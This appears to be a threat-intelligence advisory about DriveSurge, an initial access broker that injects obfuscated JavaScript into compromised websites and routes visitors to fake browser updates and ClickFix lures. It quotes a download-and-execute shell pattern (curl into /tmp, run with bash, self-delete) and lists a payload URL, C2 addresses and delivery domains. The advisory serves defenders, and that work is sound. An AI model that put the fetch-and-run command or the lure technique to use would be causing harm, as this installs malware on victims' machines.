DriveSurge — Initial Access Broker Drives Mass ClickFix & Fake Browser Update Campaign via zTDS (Silent Push) — Threadlinqs Intelligence
As of 2026-06-01, DriveSurge — Initial Access Broker Drives Mass ClickFix & Fake Browser Update Campaign via zTDS (Silent Push) is a high-severity malware threat attributed to DriveSurge, tracked by Threadlinqs Intelligence with 9 detection rules (Splunk SPL, Microsoft KQL, Sigma) and 27 indicators of compromise.
Threat ID: TL-2026-0639 · Severity: HIGH · Status: ACTIVE · Category: MALWARE
Attribution: DriveSurge · FINANCIAL
DriveSurge is a financially motivated Initial Access Broker that injects obfuscated JavaScript into thousands of compromised high-reputation websites, routing visitors through an open-source zTDS
DriveSurge is a specialized Initial Access Broker (IAB) identified by Silent Push that monetizes a Pay-Per-Install (PPI) model: it collects payment each time a victim device is successfully infected and supplies confirmed access to downstream threat actors. The operation ran largely undetected while compromising thousands of legitimate, high-reputation websites, into which DriveSurge injects hidden, obfuscated JavaScript (commonly delivered as a file named t.js with a site=[32-hex] victim identifier). The inject runs in the background and routes the visitor through a zTDS — an open-source Traffic Distribution System publicly available at ztds.info since at least 2015 (changelog v1.0.3) and used in this campaign at scale.
zTDS profiles each visitor and decides what to serve next, fetching payload scripts from a 'jsrepo' endpoint with a rotating rnd= parameter and assembling URLs via Base64 (atob()) decoding and string concatenation to hide redirect code inside normal-looking page elements. A failover mechanism cycles through multiple backup delivery servers — newtdsone.shop, cptoptious.com, and captioto.com — to maintain resilience. Researchers mapped eight distinct technical fingerprints spanning script-injection filenames (t.js, t.[12-hex].js, ext-b[12-hex].js matching SHA256 prefixes), malicious server configuration (HTTP header values, JARM, nginx version, body SHA256), and domain registration patterns (.icu TLD, ns1.erans.ru nameserver, self-named MX, ASNs 203273/210644, NiceNIC registrar), plus two WHOIS email pivots.
Victims are funneled to one of two social-engineering payloads. The FakeUpdates path serves a convincing browser-update prompt impersonating Chrome, Firefox, Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet, or UC Browser; clicking downloads a ZIP containing multiple DLL files and a malicious 'Browser Update.exe' that is executed (consistent with DLL side-loading). The ClickFix path displays a fake error or reCAPTCHA-style verification overlay instructing the victim to copy and paste a 'fix' into the Run dialog, PowerShell, or a terminal, which silently installs malware; one observed instance pulled second-stage code from 91.92.240.127, an IP already flagged in bulletproof-hosting threat-intel feeds.
The campaign is cross-platform. The analyzed macOS payload was delivered via a multi-stage shell command (pattern: cd /tmp && curl -kfsSL <url> -o <random> && bash <random> && rm -f <random>), Base64-wrapped with btoa(unescape(encodeURIComponent())) and prefixed with fake 'reCAPTCHA Verification ID' text; after downloading and executing a secondary file it self-deleted to reduce forensic traces, retrieving the payload from hxxp://46.226.166.57/ce3cbfc887?force=1 with C2 at 147.45.42.205:8133.
A separate Advertisement Distribution System (ADS), hosted on banerpanel.live with a Russian-language admin panel and a banner-js.php script, fronts the operation and acts as an anti-analysis gate: it collects device metadata (screen resolution, hardware), monitors mouse movement, scrolls, and clicks to compute a human 'trust score', applies local-storage frequency capping, and transmits telemetry with anti-forgery click hashing — ensuring payloads are withheld from sandboxes and crawlers. Infrastructure clues (Russian-language panel, ns1.erans.ru nameserver, use of tempmail.so / ycyfugihih.cfd disposable email for domain registration) point to a Russian-speaking operator, though formal nation-state attribution is low-confidence; motivation is financial.
Target sectors: cross-sector, general public, website operators, wordpress hosting
Target regions: Global
Detections & IOCs
As of 2026-07-28, this threat has 9 detection rule(s) across Splunk SPL, Microsoft KQL and Sigma, and 27 indicator(s) of compromise. Detection query text and full IOC values are available to authenticated users and programmatically via the Threadlinqs MCP server (Purple tier). View plans.
MALWARE, HIGH, threat intelligence, cybersecurity, T1583, T1584, T1588, T1608, T1592, T1189, T1204, T1204, T1059, T1059